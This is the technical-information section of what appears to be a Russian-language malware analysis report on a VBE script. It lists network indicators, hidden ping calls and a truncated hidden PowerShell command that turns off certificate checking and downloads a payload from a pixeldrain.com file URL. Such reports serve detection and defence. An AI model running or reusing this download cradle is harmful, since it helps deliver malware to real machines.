Техническая информация
- https://pixeldrain.com/api/file/2qddqqyq
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK pi###drain.com
- '<SYSTEM32>\ping.exe' pixeldrain.com' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $taMkTPGUqPuO='<PATH_SAMPLE>.vbe';[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$QNqRirBloyC=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/2Q...' (со скрытым окном)
- '<SYSTEM32>\ping.exe' pixeldrain.com